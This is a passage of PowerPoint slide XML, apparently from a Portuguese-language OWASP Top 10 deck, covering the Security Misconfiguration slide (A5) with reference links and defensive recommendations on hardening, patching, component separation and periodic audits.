            <a:ext cx="3383280" cy="26670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fontAlgn="auto">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Referências</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId4"/>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5"/>
              </a:rPr>
              <a:t>OWASP Development Guide: Chapter on Configuration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>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6"/>
              </a:rPr>
              <a:t>OWASP Code Review Guide: Chapter on Error Handling</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>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7"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Configuration Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Testing for Error Codes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>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9"/>
              </a:rPr>
              <a:t>OWASP Top 10 2004 - Insecure Configuration Management </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Para requisitos adicionais nesta área, veja </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>ASVS requirements area for Security Configuration (V12)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Externas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId11"/>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12"/>
              </a:rPr>
              <a:t>PC Magazine Article on Web Server Hardening</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>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13"/>
              </a:rPr>
              <a:t>CWE Entry 2 on Environmental Security Flaws</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>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14"/>
              </a:rPr>
              <a:t>CIS Security Configuration Guides/Benchmarks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474720" y="3657600"/>
            <a:ext cx="3383280" cy="27432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fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Como faço para evitar?</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="500" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>As </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>recomendações primárias são para estabelecer todas as medidas:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Um processo de hardening recorrente que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>torne fácil </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>e rápido de implantar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>outro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ambiente que está devidamente blindado. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Ambientes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>desenvolvimento</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>, controle de qualidade e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>produção </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>devem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ser todos configurados </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>de forma idêntica (com senhas diferentes usadas ​​em cada ambiente). Este processo deve ser automatizado para minimizar o esforço necessário para configurar um novo ambiente seguro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Um processo para se manter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>a par e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>implantar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>todas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>as novas atualizações </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>e correções de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>em </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>tempo hábil </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>e em para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>cada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ambiente. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Este processo, deve incluir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>todas as bibliotecas de código (ver novo A9)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Uma arquitetura de aplicação </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>forte que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>forneça a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>separação segura </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>e eficaz </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>entre os </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>componentes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Considere executar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>varreduras e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>fazer auditorias periodicamente para ajudar a detectar erros futuros de configuração ou </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>correções ausentes.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Configuração Incorreta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>de Segurança</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Placeholder 26"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="Group 26"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="15159" y="1014413"/>
            <a:ext cx="6669804" cy="525268"/>
            <a:chOff x="14975" y="1014596"/>
            <a:chExt cx="6670153" cy="525104"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="33" name="Group 28"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="14975" y="1014596"/>
              <a:ext cx="6670153" cy="525104"/>
              <a:chOff x="14975" y="997424"/>
              <a:chExt cx="6670153" cy="525104"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36" name="Rectangle 116"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2879691" y="1073600"/>
                <a:ext cx="1020816" cy="380881"/>
              </a:xfrm>
              <a:prstGeom prst="rect">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a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Vulnerabilidades</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t/>
                </a:r>
                <a:br>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>        de Segurança</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="37" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="476250" y="997424"/>
                <a:ext cx="139700" cy="304800"/>
                <a:chOff x="96" y="1344"/>
                <a:chExt cx="288" cy="624"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="46" name="Oval 64"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="145" y="1344"/>
                  <a:ext cx="190" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050" algn="ctr">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="47" name="Line 65"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1536"/>
                  <a:ext cx="0" cy="240"/>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48" name="Line 66"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
